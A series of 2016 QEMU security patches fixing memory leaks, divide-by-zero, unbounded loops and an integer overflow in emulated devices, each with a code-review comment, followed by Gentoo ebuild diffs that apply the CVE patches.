@@ -333,6 +333,7 @@ static void virtio_gpu_resource_create_2d(VirtIOGPU *g,
qemu_log_mask(LOG_GUEST_ERROR,
"%s: host couldn't handle guest format %d\n",
__func__, c2d.format);
+ g_free(res);
cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER;
return;
}
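Review bot: `g_free(res);` on the unsupported-format path is correct as long as res has not yet been linked into the GPU's resource list at this point; if the list insert happens earlier in virtio_gpu_resource_create_2d this would leave a dangling entry, so please confirm the ordering (validating the format before allocating would avoid the question entirely).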
--
1.8.3.1


@ -0,0 +1,26 @@
From: Li Qiang <address@hidden>
While processing isochronous transfer descriptors (iTD), if the page
select (PG) field value is out of bounds it will return. In this
situation the ehci's sg list is not freed, thus leading to a memory
leak issue. This patch avoids this.
Signed-off-by: Li Qiang <address@hidden>
---
hw/usb/hcd-ehci.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index b093db7..f4ece9a 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -1426,6 +1426,7 @@ static int ehci_process_itd(EHCIState *ehci,
if (off + len > 4096) {
/* transfer crosses page border */
if (pg == 6) {
+ qemu_sglist_destroy(&ehci->isgl);
return -1; /* avoid page pg + 1 */
}
ptr2 = (itd->bufptr[pg + 1] & ITD_BUFPTR_MASK);
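Review bot: `qemu_sglist_destroy(&ehci->isgl);` fixes the one early return that was reported, but ehci_process_itd is likely to have other `return -1` exits after the sglist is initialised; a single error label that destroys isgl, with the early returns converted to goto, would close the whole class rather than this instance. The trailing `/* avoid page pg + 1 */` comment still reads correctly after the insertion.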
--
1.8.3.1


@ -0,0 +1,61 @@
From 20009bdaf95d10bf748fa69b104672d3cfaceddf Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <address@hidden>
Date: Fri, 7 Oct 2016 10:15:29 +0200
Subject: [PATCH] xhci: limit the number of link trbs we are willing to process
Signed-off-by: Gerd Hoffmann <address@hidden>
---
hw/usb/hcd-xhci.c | 10 ++++++++++
1 file changed, 10 insertions(+)
diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c
index 726435c..ee4fa48 100644
--- a/hw/usb/hcd-xhci.c
+++ b/hw/usb/hcd-xhci.c
@@ -54,6 +54,8 @@
* to the specs when it gets them */
#define ER_FULL_HACK
+#define TRB_LINK_LIMIT 4
+
#define LEN_CAP 0x40
#define LEN_OPER (0x400 + 0x10 * MAXPORTS)
#define LEN_RUNTIME ((MAXINTRS + 1) * 0x20)
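Review bot: `#define TRB_LINK_LIMIT 4` should carry a comment on why four consecutive link TRBs is the chosen bound; a driver has no reason to chain link TRBs back to back with no work between them, so the limit is generous, but the reasoning belongs next to the constant rather than only in the commit title.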
@@ -1000,6 +1002,7 @@ static TRBType xhci_ring_fetch(XHCIState *xhci, XHCIRing *ring, XHCITRB *trb,
dma_addr_t *addr)
{
PCIDevice *pci_dev = PCI_DEVICE(xhci);
+ uint32_t link_cnt = 0;
while (1) {
TRBType type;
@@ -1026,6 +1029,9 @@ static TRBType xhci_ring_fetch(XHCIState *xhci, XHCIRing *ring, XHCITRB *trb,
ring->dequeue += TRB_SIZE;
return type;
} else {
+ if (++link_cnt > TRB_LINK_LIMIT) {
+ return 0;
+ }
ring->dequeue = xhci_mask64(trb->parameter);
if (trb->control & TRB_LK_TC) {
ring->ccs = !ring->ccs;
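Review bot: `return 0;` when the link limit is exceeded relies on callers of xhci_ring_fetch treating a zero TRBType as nothing fetched; if 0 is a reserved type value in the enum that is worth a comment, and a trace point or qemu_log_mask(LOG_GUEST_ERROR, ...) here would make a guest looping link TRBs visible to the operator.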
@@ -1043,6 +1049,7 @@ static int xhci_ring_chain_length(XHCIState *xhci, const XHCIRing *ring)
bool ccs = ring->ccs;
/* hack to bundle together the two/three TDs that make a setup transfer */
bool control_td_set = 0;
+ uint32_t link_cnt = 0;
while (1) {
TRBType type;
@@ -1058,6 +1065,9 @@ static int xhci_ring_chain_length(XHCIState *xhci, const XHCIRing *ring)
type = TRB_TYPE(trb);
if (type == TR_LINK) {
+ if (++link_cnt > TRB_LINK_LIMIT) {
+ return -length;
+ }
dequeue = xhci_mask64(trb.parameter);
if (trb.control & TRB_LK_TC) {
ccs = !ccs;
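Review bot: `return -length;` is meant to signal the error with a negative count, but if the limit is hit before any TRB has been counted, length is still 0 and the return value is indistinguishable from an empty chain; a fixed negative sentinel (for example -1) would be unambiguous, and the same logging suggestion as for xhci_ring_fetch applies here.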
--
1.8.3.1


@ -0,0 +1,34 @@
From: Li Qiang <address@hidden>
In 9pfs read dispatch function, it doesn't free two QEMUIOVector
objects, thus causing a potential memory leak. This patch avoids this.
Signed-off-by: Li Qiang <address@hidden>
---
hw/9pfs/9p.c | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index 119ee58..543a791 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -1826,14 +1826,15 @@ static void v9fs_read(void *opaque)
if (len < 0) {
/* IO error return the error */
err = len;
- goto out;
+ goto out_free_iovec;
}
} while (count < max_count && len > 0);
err = pdu_marshal(pdu, offset, "d", count);
if (err < 0) {
- goto out;
+ goto out_free_iovec;
}
err += offset + count;
+out_free_iovec:
qemu_iovec_destroy(&qiov);
qemu_iovec_destroy(&qiov_full);
} else if (fidp->fid_type == P9_FID_XATTR) {
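Review bot: the new out_free_iovec label sits inside the `if` arm that owns qiov and qiov_full, which is correct, but the error paths now destroy the iovecs and then fall through to whatever follows the else-if chain instead of jumping to `out:`. Verify that the original `out:` target (fid release and PDU completion) is still reached from there; if `out:` was doing the put_fid, this hunk trades an iovec leak for a fid reference leak.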
--
1.8.3.1

@ -0,0 +1,58 @@
From ba42ebb863ab7d40adc79298422ed9596df8f73a Mon Sep 17 00:00:00 2001
From: Li Qiang <liqiang6-s@360.cn>
Date: Mon, 17 Oct 2016 14:13:58 +0200
Subject: [PATCH] 9pfs: allocate space for guest originated empty strings
If a guest sends an empty string parameter to any 9P operation, the current
code unmarshals it into a V9fsString equal to { .size = 0, .data = NULL }.
This is unfortunate because it can cause NULL pointer dereference to happen
at various locations in the 9pfs code. And we don't want to check str->data
everywhere we pass it to strcmp() or any other function which expects a
dereferenceable pointer.
This patch enforces the allocation of genuine C empty strings instead, so
callers don't have to bother.
Out of all v9fs_iov_vunmarshal() users, only v9fs_xattrwalk() checks if
the returned string is empty. It now uses v9fs_string_size() since
name.data cannot be NULL anymore.
Signed-off-by: Li Qiang <liqiang6-s@360.cn>
[groug, rewritten title and changelog,
fix empty string check in v9fs_xattrwalk()]
Signed-off-by: Greg Kurz <groug@kaod.org>
---
fsdev/9p-iov-marshal.c | 2 +-
hw/9pfs/9p.c | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/fsdev/9p-iov-marshal.c b/fsdev/9p-iov-marshal.c
index 663cad5..1d16f8d 100644
--- a/fsdev/9p-iov-marshal.c
+++ b/fsdev/9p-iov-marshal.c
@@ -125,7 +125,7 @@ ssize_t v9fs_iov_vunmarshal(struct iovec *out_sg, int out_num, size_t offset,
str->data = g_malloc(str->size + 1);
copied = v9fs_unpack(str->data, out_sg, out_num, offset,
str->size);
- if (copied > 0) {
+ if (copied >= 0) {
str->data[str->size] = 0;
} else {
v9fs_string_free(str);
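Review bot: changing `copied > 0` to `copied >= 0` is what makes a size-0 string land in the NUL-terminating branch instead of being freed back to `data == NULL`; since `g_malloc(str->size + 1)` yields a 1-byte buffer for size 0, the `str->data[str->size] = 0` write stays in bounds. Add a one-line comment here that an empty string must still produce a dereferenceable "" because callers pass `str->data` straight to strcmp(); that is the whole point of the patch and will not be obvious from this diff later.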
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index 119ee58..39a7e1d 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -3174,7 +3174,7 @@ static void v9fs_xattrwalk(void *opaque)
goto out;
}
v9fs_path_copy(&xattr_fidp->path, &file_fidp->path);
- if (name.data == NULL) {
+ if (!v9fs_string_size(&name)) {
/*
* listxattr request. Get the size first
*/
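Review bot: this hunk is mandatory, not cosmetic: once unmarshal always allocates, `name.data == NULL` can never be true and a listxattr request (empty name) would be mishandled as a getxattr of the empty attribute name; `!v9fs_string_size(&name)` restores the intended distinction. Any other site in 9p.c that used `.data == NULL` as an "absent" sentinel needs the same audit; the commit message claims v9fs_xattrwalk is the only one, and that claim is what reviewers should check.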
--
2.7.3

@ -0,0 +1,30 @@
From: Prasad J Pandit <address@hidden>
The Rocker network switch emulator has test registers to help debug
DMA operations. While testing host DMA access, a buffer address
is written to register 'TEST_DMA_ADDR' and its size is written to
register 'TEST_DMA_SIZE'. When performing the TEST_DMA_CTRL_INVERT
test, if the DMA buffer size was greater than 'INT_MAX', it leads to
an invalid buffer access. Limit the DMA buffer size to avoid it.
Reported-by: Huawei PSIRT <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/net/rocker/rocker.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/net/rocker/rocker.c b/hw/net/rocker/rocker.c
index 30f2ce4..e9d215a 100644
--- a/hw/net/rocker/rocker.c
+++ b/hw/net/rocker/rocker.c
@@ -860,7 +860,7 @@ static void rocker_io_writel(void *opaque, hwaddr addr, uint32_t val)
rocker_msix_irq(r, val);
break;
case ROCKER_TEST_DMA_SIZE:
- r->test_dma_size = val;
+ r->test_dma_size = val & 0xFFFF;
break;
case ROCKER_TEST_DMA_ADDR + 4:
r->test_dma_addr = ((uint64_t)val) << 32 | r->lower32;
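Review bot: `val & 0xFFFF` silently truncates rather than rejecting: a guest writing 0x10000 ends up with test_dma_size 0 and one writing 0x1FFFF gets 0xFFFF, neither of which is what it asked for. Name the bound (a ROCKER_TEST_DMA_SIZE_MAX style define is only a suggestion) with a comment explaining that it keeps the TEST_DMA_CTRL_INVERT buffer well below INT_MAX, and consider whether the size should be checked against the register's actual limit instead of an arbitrary 16-bit mask.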
--
2.5.5

@ -0,0 +1,29 @@
From: Prasad J Pandit <address@hidden>
The JAZZ RC4030 chipset emulator has a periodic timer and an
associated interval reload register. The reload value is used
as a divider when computing the timer's next tick value. If the reload
value is large, it could lead to a divide by zero error. Limit
the interval reload value to avoid it.
Reported-by: Huawei PSIRT <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/dma/rc4030.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/dma/rc4030.c b/hw/dma/rc4030.c
index 2f2576f..c1b4997 100644
--- a/hw/dma/rc4030.c
+++ b/hw/dma/rc4030.c
@@ -460,7 +460,7 @@ static void rc4030_write(void *opaque, hwaddr addr, uint64_t data,
break;
/* Interval timer reload */
case 0x0228:
- s->itr = val;
+ s->itr = val & 0x01FF;
qemu_irq_lower(s->timer_irq);
set_next_tick(s);
break;
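Review bot: masking with 0x01FF bounds the reload value to 9 bits but still admits `itr == 0`; the commit message attributes the divide by zero to large reload values, so either set_next_tick() already copes with 0 or the check is incomplete. State which in a comment on this line, and give the magic 0x01FF a named constant or a comment tying it to the RC4030 interval timer register width.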
--
2.5.5

@ -0,0 +1,34 @@
From: Prasad J Pandit <address@hidden>
The 16550A UART device uses an oscillator to generate frequencies
(baud base), which decide the communication speed. This speed could
be changed by dividing it by a divider. If the divider is
greater than the baud base, the speed is set to zero, leading to a
divide by zero error. Add a check to avoid it.
Reported-by: Huawei PSIRT <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/char/serial.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
Update per
-> https://lists.gnu.org/archive/html/qemu-devel/2016-10/msg02400.html
diff --git a/hw/char/serial.c b/hw/char/serial.c
index 3442f47..eec72b7 100644
--- a/hw/char/serial.c
+++ b/hw/char/serial.c
@@ -153,8 +153,9 @@ static void serial_update_parameters(SerialState *s)
int speed, parity, data_bits, stop_bits, frame_size;
QEMUSerialSetParams ssp;
- if (s->divider == 0)
+ if (s->divider == 0 || s->divider > s->baudbase) {
return;
+ }
/* Start bit. */
frame_size = 1;
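Review bot: the early return when `s->divider > s->baudbase` leaves the previously programmed line parameters in place and gives the guest no indication that the new divisor was ignored. That is acceptable for an emulator, but say so in a comment at the check, since a reader may otherwise assume the speed is clamped rather than the update dropped. Adding braces to the single-statement `if` matches QEMU coding style.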
--
2.5.5

@ -0,0 +1,31 @@
From: Prasad J Pandit <address@hidden>
The Intel HDA emulator uses a stream of buffers during DMA data
transfers. Each entry has a buffer length and a buffer pointer
position, which are used to derive the bytes to 'copy'. If this
length and buffer pointer were to be the same, 'copy' could be
set to zero(0), leading to an infinite loop. Add a check to
avoid it.
Reported-by: Huawei PSIRT <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/audio/intel-hda.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/hw/audio/intel-hda.c b/hw/audio/intel-hda.c
index cd95340..537face 100644
--- a/hw/audio/intel-hda.c
+++ b/hw/audio/intel-hda.c
@@ -416,7 +416,8 @@ static bool intel_hda_xfer(HDACodecDevice *dev, uint32_t stnr, bool output,
}
left = len;
- while (left > 0) {
+ s = st->bentries;
+ while (left > 0 && s-- > 0) {
copy = left;
if (copy > st->bsize - st->lpib)
copy = st->bsize - st->lpib;
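Review bot: `s` is assigned from st->bentries and used as a countdown without being declared in this hunk, so confirm it is a local signed integer that is not reused after the loop (it is left at -1 when the bound is what terminates it). More importantly, the bound caps the loop at the number of buffer entries but does not address the root cause named in the message: `copy == 0` when `st->lpib == st->bsize` still produces an iteration that transfers nothing. An explicit `if (copy == 0) break;`, or advancing to the next entry in that case, would make the invariant clear instead of relying on the iteration count.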
--
2.7.4

@ -0,0 +1,29 @@
From: Prasad J Pandit <address@hidden>
The RTL8139 ethernet controller in C+ mode supports multiple
descriptor rings, each with a maximum of 64 descriptors. While
processing the transmit descriptor ring in 'rtl8139_cplus_transmit',
it does not limit the descriptor count and runs forever. Add a
check to avoid it.
Reported-by: Andrew Henderson <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/net/rtl8139.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index 3345bc6..f05e59c 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2350,7 +2350,7 @@ static void rtl8139_cplus_transmit(RTL8139State *s)
{
int txcount = 0;
- while (rtl8139_cplus_transmit_one(s))
+ while (txcount < 64 && rtl8139_cplus_transmit_one(s))
{
++txcount;
}
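Review bot: the 64 is the per-ring descriptor maximum stated in the commit message; make it a named constant (or reuse one if rtl8139.c already defines the ring size) rather than a literal in the loop condition. Also document that descriptors not consumed within 64 iterations are left for the next transmit trigger rather than dropped, assuming that is how rtl8139_cplus_transmit_one resumes; if it does not, the cap changes guest-visible behaviour for rings that legitimately wrap.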
--
2.7.4

@ -0,0 +1,21 @@
From: Li Qiang <address@hidden>
The 'fs.xattr.value' field in V9fsFidState object doesn't consider the
situation that this field has been allocated previously. Every time, it
will be allocated directly. This leads to a host memory leak issue. This
patch fixes this.
--
1.8.3.1
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index 75ba5f1..a4c7109 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -3269,6 +3269,7 @@ static void v9fs_xattrcreate(void *opaque)
xattr_fidp->fs.xattr.flags = flags;
v9fs_string_init(&xattr_fidp->fs.xattr.name);
v9fs_string_copy(&xattr_fidp->fs.xattr.name, &name);
+ g_free(xattr_fidp->fs.xattr.value);
xattr_fidp->fs.xattr.value = g_malloc(size);
err = offset;
put_fid(pdu, file_fidp);
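Review bot: freeing the previous fs.xattr.value before reallocating closes the leak on repeated xattrcreate against the same fid, but the fresh `g_malloc(size)` buffer is uninitialised, so an xattr read before any write still exposes host heap contents; the follow-up patch on this page ("9pfs: fix information leak in xattr read") switches this line to g_malloc0 for exactly that reason. Also check that any bookkeeping of how many bytes have been written into the value is reset alongside the reallocation, since the hunk only shows the buffer being replaced. Separately, this patch file carries its `--` / `1.8.3.1` signature lines before the diff instead of after it; `git am` would stop at the signature, so reorder the file even though patch(1) via epatch copes with it.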

@ -0,0 +1,27 @@
Author: Li Qiang <liqiang6-s@360.cn>
Date: Mon Oct 17 14:13:58 2016 +0200
9pfs: fix information leak in xattr read
9pfs uses g_malloc() to allocate the xattr memory space, if the guest
reads this memory before writing to it, this will leak host heap memory
to the guest. This patch avoids this.
Signed-off-by: Li Qiang <liqiang6-s@360.cn>
Reviewed-by: Greg Kurz <groug@kaod.org>
Signed-off-by: Greg Kurz <groug@kaod.org>
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index 26aa7d5..bf23b01 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -3269,8 +3269,8 @@ static void coroutine_fn v9fs_xattrcreate(void *opaque)
xattr_fidp->fs.xattr.flags = flags;
v9fs_string_init(&xattr_fidp->fs.xattr.name);
v9fs_string_copy(&xattr_fidp->fs.xattr.name, &name);
g_free(xattr_fidp->fs.xattr.value);
- xattr_fidp->fs.xattr.value = g_malloc(size);
+ xattr_fidp->fs.xattr.value = g_malloc0(size);
err = offset;
put_fid(pdu, file_fidp);
out_nofid:
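Review bot: g_malloc0 zero-fills the value buffer, so a guest that reads the xattr before writing it sees zeros instead of recycled host heap. Put a short comment on this line ("zeroed: guest may read before write") so a future cleanup does not "optimise" it back to g_malloc and silently reintroduce the information leak.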

@ -0,0 +1,92 @@
From 7e55d65c56a03dcd2c5d7c49d37c5a74b55d4bd6 Mon Sep 17 00:00:00 2001
From: Li Qiang <liqiang6-s@360.cn>
Date: Tue, 1 Nov 2016 12:00:40 +0100
Subject: [PATCH] 9pfs: fix integer overflow issue in xattr read/write
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
The v9fs_xattr_read() and v9fs_xattr_write() are passed a guest
originated offset: they must ensure this offset does not go beyond
the size of the extended attribute that was set in v9fs_xattrcreate().
Unfortunately, the current code implements these checks with unsafe
calculations on 32 and 64 bit values, which may allow a malicious
guest to cause OOB access anyway.
Fix this by comparing the offset and the xattr size, which are
both uint64_t, before trying to compute the effective number of bytes
to read or write.
Suggested-by: Greg Kurz <groug@kaod.org>
Signed-off-by: Li Qiang <liqiang6-s@360.cn>
Reviewed-by: Greg Kurz <groug@kaod.org>
Reviewed-By: Guido Günther <agx@sigxcpu.org>
Signed-off-by: Greg Kurz <groug@kaod.org>
---
hw/9pfs/9p.c | 32 ++++++++++++--------------------
1 file changed, 12 insertions(+), 20 deletions(-)
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index ab18ef2..7705ead 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -1637,20 +1637,17 @@ static int v9fs_xattr_read(V9fsState *s, V9fsPDU *pdu, V9fsFidState *fidp,
{
ssize_t err;
size_t offset = 7;
- int read_count;
- int64_t xattr_len;
+ uint64_t read_count;
V9fsVirtioState *v = container_of(s, V9fsVirtioState, state);
VirtQueueElement *elem = v->elems[pdu->idx];
- xattr_len = fidp->fs.xattr.len;
- read_count = xattr_len - off;
+ if (fidp->fs.xattr.len < off) {
+ read_count = 0;
+ } else {
+ read_count = fidp->fs.xattr.len - off;
+ }
if (read_count > max_count) {
read_count = max_count;
- } else if (read_count < 0) {
- /*
- * read beyond XATTR value
- */
- read_count = 0;
}
err = pdu_marshal(pdu, offset, "d", read_count);
if (err < 0) {
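Review bot: read_count is now uint64_t but is still passed through the "d" (4-byte) format in `pdu_marshal(pdu, offset, "d", read_count)`; the clamp to max_count keeps the value in range, but handing a 64-bit argument to a varargs consumer for a 32-bit field is fragile, so cast explicitly to uint32_t at the call. The `fidp->fs.xattr.len < off` test followed by `len - off` is the right way to avoid the signed wrap described in the message; the later `read_count > max_count` comparison is only sound if max_count is itself unsigned, which this hunk does not show.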
@@ -1979,23 +1976,18 @@ static int v9fs_xattr_write(V9fsState *s, V9fsPDU *pdu, V9fsFidState *fidp,
{
int i, to_copy;
ssize_t err = 0;
- int write_count;
- int64_t xattr_len;
+ uint64_t write_count;
size_t offset = 7;
- xattr_len = fidp->fs.xattr.len;
- write_count = xattr_len - off;
- if (write_count > count) {
- write_count = count;
- } else if (write_count < 0) {
- /*
- * write beyond XATTR value len specified in
- * xattrcreate
- */
+ if (fidp->fs.xattr.len < off) {
err = -ENOSPC;
goto out;
}
+ write_count = fidp->fs.xattr.len - off;
+ if (write_count > count) {
+ write_count = count;
+ }
err = pdu_marshal(pdu, offset, "d", write_count);
if (err < 0) {
return err;
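Review bot: the deleted comment ("write beyond XATTR value len specified in xattrcreate") explained the -ENOSPC; keep an equivalent comment on the new `if (fidp->fs.xattr.len < off)` check. Note the boundary semantics: `off == len` is no longer an error and yields write_count 0, which mirrors the read path in the previous hunk; state that intentionally in the comment so the two paths do not drift apart later.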
--
2.7.3

@ -0,0 +1,25 @@
From: Li Qiang <address@hidden>
In the v9fs_link dispatch function, it doesn't put the 'oldfidp'
fid object, so 'oldfidp->ref' never reaches 0,
thus leading to a memory leak issue. This patch fixes this.
Signed-off-by: Li Qiang <address@hidden>
---
hw/9pfs/9p.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index 8b50bfb..29f8b7a 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -2413,6 +2413,7 @@ static void v9fs_link(void *opaque)
if (!err) {
err = offset;
}
+ put_fid(pdu, oldfidp);
out:
put_fid(pdu, dfidp);
out_nofid:
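Review bot: `put_fid(pdu, oldfidp)` placed just before `out:` covers the paths that fall through to it, but any `goto out` between the get_fid of oldfidp and this point (not visible in the hunk) would still leak the reference; the usual pattern in 9p.c is a dedicated label that those error paths jump to. Please confirm there are no such early exits, or add the label.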
--
1.8.3.1

@ -0,0 +1,27 @@
Author: Li Qiang <liqiang6-s@360.cn>
Date: Mon Oct 17 14:13:58 2016 +0200
9pfs: fix memory leak in v9fs_write
If an error occurs when marshalling the transfer length to the guest, the
v9fs_write() function doesn't free an IO vector, thus leading to a memory
leak. This patch fixes the issue.
Signed-off-by: Li Qiang <liqiang6-s@360.cn>
Reviewed-by: Greg Kurz <groug@kaod.org>
[groug, rephrased the changelog]
Signed-off-by: Greg Kurz <groug@kaod.org>
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index d43a552..e88cf25 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -2090,7 +2090,7 @@ static void coroutine_fn v9fs_write(void *opaque)
offset = 7;
err = pdu_marshal(pdu, offset, "d", total);
if (err < 0) {
- goto out;
+ goto out_qiov;
}
err += offset;
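Review bot: the `out_qiov` label is not in the hunk, so confirm it exists in v9fs_write, that it destroys the IO vector, and that it then falls through to the `out:` cleanup (put_fid and PDU completion) rather than bypassing it; otherwise this hunk swaps a leak of the iovec for a leak of the fid.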

@ -10,7 +10,7 @@ PYTHON_REQ_USE="ncurses,readline"
PLOCALES="bg de_DE fr_FR hu it tr zh_CN" PLOCALES="bg de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils l10n user udev fcaps readme.gentoo-r1 pax-utils l10n
if [[ ${PV} = *9999* ]]; then if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git" EGIT_REPO_URI="git://git.qemu.org/qemu.git"
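Review bot: switching the inherit from readme.gentoo to readme.gentoo-r1 changes the eclass API: -r1 no longer installs the README automatically from src_install, so the ebuild must call readme.gentoo_create_doc itself and readme.gentoo_print_elog in pkg_postinst. This hunk only shows the inherit line; confirm those phase functions were updated in the same commit.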
@ -94,7 +94,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
!gtk2? ( !gtk2? (
x11-libs/gtk+:3 x11-libs/gtk+:3
vte? ( x11-libs/vte:2.90 ) vte? ( x11-libs/vte:2.91 )
) )
) )
infiniband? ( sys-fabric/librdmacm:=[static-libs(+)] ) infiniband? ( sys-fabric/librdmacm:=[static-libs(+)] )
@ -108,7 +108,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
virtual/opengl virtual/opengl
media-libs/libepoxy[static-libs(+)] media-libs/libepoxy[static-libs(+)]
media-libs/mesa[static-libs(+)] media-libs/mesa[static-libs(+)]
media-libs/mesa[egl,gles2] media-libs/mesa[egl,gles2,gbm]
) )
png? ( media-libs/libpng:0=[static-libs(+)] ) png? ( media-libs/libpng:0=[static-libs(+)] )
pulseaudio? ( media-sound/pulseaudio ) pulseaudio? ( media-sound/pulseaudio )
@ -334,7 +334,36 @@ src_prepare() {
epatch "${FILESDIR}"/${PN}-2.5.0-cflags.patch epatch "${FILESDIR}"/${PN}-2.5.0-cflags.patch
epatch "${FILESDIR}"/${PN}-2.5.0-sysmacros.patch epatch "${FILESDIR}"/${PN}-2.5.0-sysmacros.patch
epatch "${FILESDIR}"/${P}-CVE-2016-6836.patch
epatch "${FILESDIR}"/${P}-CVE-2016-6836.patch # bug 591242
epatch "${FILESDIR}"/${P}-CVE-2016-7155.patch # bug 593034
epatch "${FILESDIR}"/${P}-CVE-2016-7156.patch # bug 593036
epatch "${FILESDIR}"/${P}-CVE-2016-7157-1.patch # bug 593038
epatch "${FILESDIR}"/${P}-CVE-2016-7157-2.patch # bug 593038
epatch "${FILESDIR}"/${P}-CVE-2016-7170.patch # bug 593284
epatch "${FILESDIR}"/${P}-CVE-2016-7421.patch # bug 593950
epatch "${FILESDIR}"/${P}-CVE-2016-7422.patch # bug 593956
epatch "${FILESDIR}"/${P}-CVE-2016-7423.patch # bug 594368
epatch "${FILESDIR}"/${P}-CVE-2016-7466.patch # bug 594520
epatch "${FILESDIR}"/${P}-CVE-2016-7907.patch # bug 596048
epatch "${FILESDIR}"/${P}-CVE-2016-7908.patch # bug 596049
epatch "${FILESDIR}"/${P}-CVE-2016-7909.patch # bug 596048
epatch "${FILESDIR}"/${P}-CVE-2016-7994-1.patch # bug 596738
epatch "${FILESDIR}"/${P}-CVE-2016-7994-2.patch # bug 596738
epatch "${FILESDIR}"/${P}-CVE-2016-8576.patch # bug 596752
epatch "${FILESDIR}"/${P}-CVE-2016-8577.patch # bug 596776
epatch "${FILESDIR}"/${P}-CVE-2016-8578.patch # bug 596774
epatch "${FILESDIR}"/${P}-CVE-2016-8668.patch # bug 597110
epatch "${FILESDIR}"/${P}-CVE-2016-8669-1.patch # bug 597108
epatch "${FILESDIR}"/${P}-CVE-2016-8669-2.patch # bug 597108
epatch "${FILESDIR}"/${P}-CVE-2016-8909.patch # bug 598044
epatch "${FILESDIR}"/${P}-CVE-2016-8910.patch # bug 598046
epatch "${FILESDIR}"/${P}-CVE-2016-9102.patch # bug 598328
epatch "${FILESDIR}"/${P}-CVE-2016-9103.patch # bug 598328
epatch "${FILESDIR}"/${P}-CVE-2016-9104.patch # bug 598328
epatch "${FILESDIR}"/${P}-CVE-2016-9105.patch # bug 598328
epatch "${FILESDIR}"/${P}-CVE-2016-9106.patch # bug 598772
# Fix ld and objcopy being called directly # Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY tc-export AR LD OBJCOPY
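Review bot: the left column shows only ${P}-CVE-2016-6836.patch, so the other 28 CVE patches are new here and are applied one by one with epatch, which dies on the first patch that fails to apply; keep the three two-part series (7157-1/-2, 7994-1/-2, 8669-1/-2) in this order since the second part depends on the first. Several entries share a bug reference (7907 and 7909 both cite 596048; 9102 through 9105 all cite 598328), which is fine if those bugs track multiple CVEs but is worth checking against the tracker before merging.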

@ -9,7 +9,7 @@ PYTHON_REQ_USE="ncurses,readline"
PLOCALES="bg de_DE fr_FR hu it tr zh_CN" PLOCALES="bg de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils l10n user udev fcaps readme.gentoo-r1 pax-utils l10n
if [[ ${PV} = *9999* ]]; then if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git" EGIT_REPO_URI="git://git.qemu.org/qemu.git"
@ -93,7 +93,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
!gtk2? ( !gtk2? (
x11-libs/gtk+:3 x11-libs/gtk+:3
vte? ( x11-libs/vte:2.90 ) vte? ( x11-libs/vte:2.91 )
) )
) )
infiniband? ( sys-fabric/librdmacm:=[static-libs(+)] ) infiniband? ( sys-fabric/librdmacm:=[static-libs(+)] )
@ -107,7 +107,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
virtual/opengl virtual/opengl
media-libs/libepoxy[static-libs(+)] media-libs/libepoxy[static-libs(+)]
media-libs/mesa[static-libs(+)] media-libs/mesa[static-libs(+)]
media-libs/mesa[egl,gles2] media-libs/mesa[egl,gles2,gbm]
) )
png? ( media-libs/libpng:0=[static-libs(+)] ) png? ( media-libs/libpng:0=[static-libs(+)] )
pulseaudio? ( media-sound/pulseaudio ) pulseaudio? ( media-sound/pulseaudio )